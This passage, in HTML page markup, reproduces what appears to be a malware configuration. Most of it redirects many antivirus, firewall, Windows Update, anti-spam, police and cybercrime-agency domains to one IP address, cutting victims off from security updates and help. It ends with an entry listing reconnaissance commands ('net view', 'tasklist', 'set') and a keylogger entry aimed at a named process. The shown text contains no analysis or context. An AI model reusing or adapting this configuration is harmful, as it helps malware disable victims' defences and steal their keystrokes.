<span style="font-family: Arial; font-size: 10.0pt;">myaccount.bitdefender.co,=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forum.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">upgrade.bitdefender.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">agnitum.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.agnitum.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">outpostfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.outpostfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl1.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dl2.agnitum.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">forums.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">comodogroup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.comodogroup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">personalfirewall.comodo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.personalfirewall.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">hackerguardian.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.hackerguardian.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nsclean.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nsclean.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">db.local.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamsupport.sourcefire.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lurker.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">wiki.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">w32.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lists.clamav.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ru.clamwin.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">gietl.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.gietl.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">clamav.dyndns.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">support.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.f-secure.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-secure.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-secure.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail01.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">retail02.sp.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.europe.f-secure.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">norman.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.norman.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">download.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sandbox.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">niuone.norman.no=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasecurity.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">viruslab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.viruslab.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">acs.pandasoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pandasoftware.es=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-virus.by=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-virus.by=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">virusblokada.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.virusblokada.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vba32.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vba32.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.nai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secuser.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.secuser.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tds.diamondcs.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoftusa.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoftusa.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">lavasoftusa.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoftusa.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">diamondcs.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">shop.ca.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">downloads.my-etrust.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">v4.windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">v5.windowsupdate.microsoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">noadware.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.noadware.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">moosoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.moosoft.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secuser.model-fx.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pccreg.antivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">k-otik.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vupen.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vupen.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">housecall.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">us.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">uk.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">de.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fr.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">es.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">au.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">it.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">br.trendmicro.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus.cai.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">sophos.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.sophos.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">securitoo.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nordnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nordnet.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">avgfrance.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.avgfrance.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antivirus-online.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antivirus-online.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.esafe.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.microworldsystems.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ftp.ca.co=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files.trendmicro-europe.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">inline-software.de=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ravantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ravantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">files.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">secure.f-prot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">vsantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vsantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">openantivirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.openantivirus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www3.ca.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dialognauka.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dialognauka.ru=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">anti-virus-software-review.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.anti-virus-software-review.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.vet.com.au=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">antiviraldp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.antiviraldp.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.proantivirus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">pestpatrol.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.pestpatrol.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">simplysup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.simplysup.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">misec.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.misec.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www1.my-etrust.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">authentium.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.authentium.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">finjan.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.finjan.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ikarus-software.at=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ika-rus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ika-rus.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">tinysoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.tinysoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">visualizesoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.visualizesoftware.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">kerio.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kerio.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.kerio.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelabs.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">zonelog.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.zonelog.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.webroot.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.lavasoft.nu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spywareguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spywareguide.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spyblocker-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spyblocker-software.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamhaus.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spamcop.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamcop.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">bobbear.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.bobbear.co.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">domaintools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.domaintools.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.centralops.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.robtex.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">dnsstuff.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.dnsstuff.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">ripe.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.ripe.net=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.met.police.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">nbi.gov.ph=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.nbi.gov.ph=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.police.gov.hk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">treasury.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.treasury.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">cybercrime.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.cybercrime.gov=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.cybercrime.ch=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">enisa.europa.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.enisa.europa.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.interpol.int=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.fsa.gov.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.companies-house.gov.uk=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">fraudaid.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.fraudaid.com=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">scambusters.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.scambusters.org=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">spamtrackers.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">www.spamtrackers.eu=209.85.229.104<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "CmdList"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "net view"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "tasklist"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> "set"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> entry "Keylogger"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> processes "calc___.exe"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> time 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> <o:p></o:p></span></div>
<div class="MsoNormal">
